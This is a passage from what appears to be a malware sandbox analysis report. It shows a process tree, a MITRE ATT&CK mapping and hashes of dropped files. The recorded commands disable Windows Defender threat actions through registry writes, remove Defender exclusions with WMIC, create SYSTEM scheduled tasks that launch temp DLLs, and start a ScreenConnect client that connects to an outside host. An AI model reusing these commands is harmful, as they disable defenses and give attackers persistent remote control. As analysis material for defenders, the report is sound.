PID:6644

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:3028

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
PID:7828

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:8596

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:1628

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:9552

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:5584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:7060

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:3316

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"
2⤵
PID:5792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
2⤵
PID:5340

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
3⤵
PID:6536

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
4⤵
PID:6672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
PID:4436

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
PID:6724

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\aRQZZB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F
2⤵
- Creates scheduled task(s)
PID:6072

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\DvxzZAH.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:8028

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ucrVpivlTlXwlAC"
2⤵
PID:5468

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"
2⤵
PID:9060

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\tLLcoqT.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2456

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\FOepACp.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:8848

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\JYpwRcE.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:8056

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\RaFgqxH.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:8344

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 12:47:24 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\WXybHerv\JJuuZPr.dll\",#1 /OKdide 385118" /V1 /F
2⤵
- Creates scheduled task(s)
PID:9128

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"
2⤵
PID:8920

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"
2⤵
PID:9328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2056
2⤵
- Program crash
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5424 -ip 5424
1⤵
PID:9420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 8280 -ip 8280
1⤵
PID:5200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3268 -ip 3268
1⤵
PID:5708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:5148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc06d746f8,0x7ffc06d74708,0x7ffc06d74718
2⤵
PID:372

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
PID:8560

C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
1⤵
PID:4856

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\pBWAvOjS\PyURJyN.dll",#1 /zUdidi 385118
1⤵
PID:7732

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\pBWAvOjS\PyURJyN.dll",#1 /zUdidi 385118
2⤵
PID:6872

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"
3⤵
PID:9608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6356 -ip 6356
1⤵
PID:6484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6556 -ip 6556
1⤵
PID:1612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6756 -ip 6756
1⤵
PID:5156

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\WXybHerv\JJuuZPr.dll",#1 /OKdide 385118
1⤵
PID:8760

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\WXybHerv\JJuuZPr.dll",#1 /OKdide 385118
2⤵
PID:7300

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"
3⤵
PID:6620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5308 -ip 5308
1⤵
PID:9240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:9472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc05b746f8,0x7ffc05b74708,0x7ffc05b74718
2⤵
PID:8728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3712 -ip 3712
1⤵
PID:3288

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
PID:9788

C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
1⤵
PID:5208

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5024

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 60D6943A471A50D59E1268F86B149D9E C
2⤵
PID:6072

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI29CD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241053484 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
3⤵
PID:5840

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 36FD6221A495A8CA05972D05957C5C5E
2⤵
PID:9268

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 431C3B48ADA4686DFE69940B540129EC E Global\MSI0000
2⤵
PID:9596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6540 -ip 6540
1⤵
PID:900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4496 -ip 4496
1⤵
PID:7968

C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=support.cagboot.com&p=8019&s=0fa5991b-24ab-432f-a7b3-1ad9878a26c6&k=BgIAAACkAABSU0ExAAgAAAEAAQC33BYiLLzjA0HB310eKHeWmWeBQVx26yHNU%2fZC0WHrAlcNPvscK6LX9rCshcpYxJNlp6Gr1byJz3q1uPEPhnXk%2fOQN38rohQydIODiuiyid0XP7IqW3wCeRLR4nYsDs7O9XY%2bU55HYBFfSZubUf0lRJ194P6JONzWHVWVmNby7dnCVgQX%2fXUVmXF%2bHjS%2f6ncVL9IHMmpOlTK7pZs7J5eSUPSw6tC%2bfRb2Yt0DESC45AJz1cXuqGwYAMS%2fdbmEwV37KU%2fcSd50XBkGWCpRo50msgOdDjAoSr0D5rfHkAk3mHfBYPSyXeg16GrgfCZwPOp4B3gxshRdSlj%2fXo6qPfv%2b4&t=APSVR&c=Server&c=&c=&c=&c=&c=&c=&c="
1⤵
PID:1856

C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (85c3a110f21a413f)\ScreenConnect.WindowsClient.exe" "RunRole" "dbfe12ea-726b-4a03-ae28-b597425d1507" "User"
2⤵
PID:5852

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
PID:1464

C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
1⤵
PID:3464

C:\Windows\system32\BackgroundTaskHost.exe
"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
1⤵
PID:6116

C:\Users\Admin\AppData\Local\Temp\7zS3B90.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS3B90.tmp\Install.exe PP /oGXdidAccR 385118 /S
1⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:7716

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:9028

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:5184

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:6232

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:900

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:1800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:8116

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 02:46:46 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pXCjFwI.exe\" 0c /wGLddidtm 385118 /S" /V1 /F
2⤵
- Creates scheduled task(s)
PID:8336

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
2⤵
PID:3488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 8932 -ip 8932
1⤵
PID:6344

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:1580

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pXCjFwI.exe
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\pXCjFwI.exe 0c /wGLddidtm 385118 /S
1⤵
PID:9880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1616 -ip 1616
1⤵
PID:9968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e5e3ae5.rbs
Filesize
212KB

MD5
a173aa6e7ed69b3ae04789c7426a5233

SHA1
21f57537d1603c405873518371a9db3c65033091

SHA256
92fecdbfd85f13b2b9cbbc90df57339eba5e3c5194b1fde708f21fff55da00c0

SHA512
8c01c9971a587c4841ef1352cdd664414f34556caa91ef53c37059e2b6ebb87329941a6bfdee8be2317357f5e3256905f0a370830d43ffaa2be522e91cb0a76f

Download Submit
C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\microsoft.system.package.metadata\resources.5295ec3d.pri
Filesize
17KB

MD5
48a2238caf91979de13acdbaa5847073

SHA1
f3a3530f7c9f81908ab8e6d39d4444e6f04c25bd

SHA256
c994fa7c630769359c2f80870dda54f970143ba70ba3dade07f47dc816c5b026

SHA512
c4c742ff3a24f11ad4dc2d7c69c8678e7f766aa144e02da7ede67b4206fbf3ef620896dac6e59ef0cc4d44af15f96aa78f2b06c83114b2538404a86901b1cfd9

Download Submit
C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe
Filesize
63KB

MD5
0d5df43af2916f47d00c1573797c1a13

SHA1
230ab5559e806574d26b4c20847c368ed55483b0

SHA256
c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc

SHA512
f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
4280e36a29fa31c01e4d8b2ba726a0d8

SHA1
c485c2c9ce0a99747b18d899b71dfa9a64dabe32

SHA256
e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

SHA512
494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
Filesize
114B

MD5
0527acb00604bb9fd026d0273a7ec3a2

SHA1
c6aaa98db02de139ae805ebccf41180a346a2227

SHA256
981e54413e6aa00942c6c5d29b70017eeb89548011740123fbb881cafdb11acc

SHA512
a00adf315cc229326fb3072e28a92f1c07b6f79a2f78ff80c254a25f231be179d6b2703963f95ab9fd4234624e99c23a7517a719672b072549cd299db19834c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\70aea187-f5e8-40da-8db2-d055dfd58c87.dmp
Filesize
3.6MB

MD5
539a58e1169b2ff0499fad1ec0cc522d

SHA1
cb3ee575d55bb86ce0b9099af64ad11a7d7393f4

SHA256
3b100e69a55113e7b2eb3cf959b9cdd0a3e98b7a4cbd34771c64e9147f21fb71

SHA512
c6e1fc0b1e4afe00a7fc404ed4f84666a8de3d36342c011bdd3ac8619f9ebeb37ec6fc85355a97821513fd38a56a639fee39078dbd1ca3d19f516668777e6942

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
4158365912175436289496136e7912c2

SHA1
813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59

SHA256
354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1

SHA512
74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ce4c898f8fc7601e2fbc252fdadb5115

SHA1
01bf06badc5da353e539c7c07527d30dccc55a91

SHA256
bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa

SHA512
80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ad46f16c56fc66c27c5f6e6f1bf4a23d

SHA1
c1e59e884a4dda4b63823ed49662df0155483618

SHA256
8dd79c600169d0c8b1dfb5ce9b9475815bdfc4a18e542405ee95f4f60a8aed8f

SHA512
cd3caa1a77f1ff473f44f0440338bebaa5bc53231ed6eb454bcc9bb3661c8977d9c47bd723d1a157255db188c778601d1a00639e5a0c6ec65d2435f0972a938a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
336B

MD5
3bacfe67c45473209afa22f452f4eb8d

SHA1
e68b440d54484310228487e75a993851190e7ef7

SHA256
c556aa04798a4bbdddfac1d5ec9e76c08af63a7ac1e325a61de89aff9cd5def1

SHA512
39416844c26834a3cf0d84356c1fed8d4fd50c4e28c1e0e374324060ea7b561743d8219f7e5f14c199cb9287e6fb6ee9329536734235ed06a93227b33e47f3a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
1KB

MD5
3ed9f042dedd243c7f6195332ee5adab

SHA1
0cc14989d107d2a2da0087a0cca3d1d0bad619d6

SHA256
58a9befb8f4cc688921bc72660913f34e6232db0e2bf9d37cf4227ae9e2a9f48

SHA512
19ed177dbcd448b2b3bef20bbb0c98b3573d3000c8a7700d40ccf7785700d939ac040dec376b71faf9e2b5bba92759a1e33b492f0e1ce636fdfcf73e973c3947

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe59e630.TMP
Filesize
1KB

MD5
bb4c7702b72ee2eb9d66fff8283b3cef

SHA1
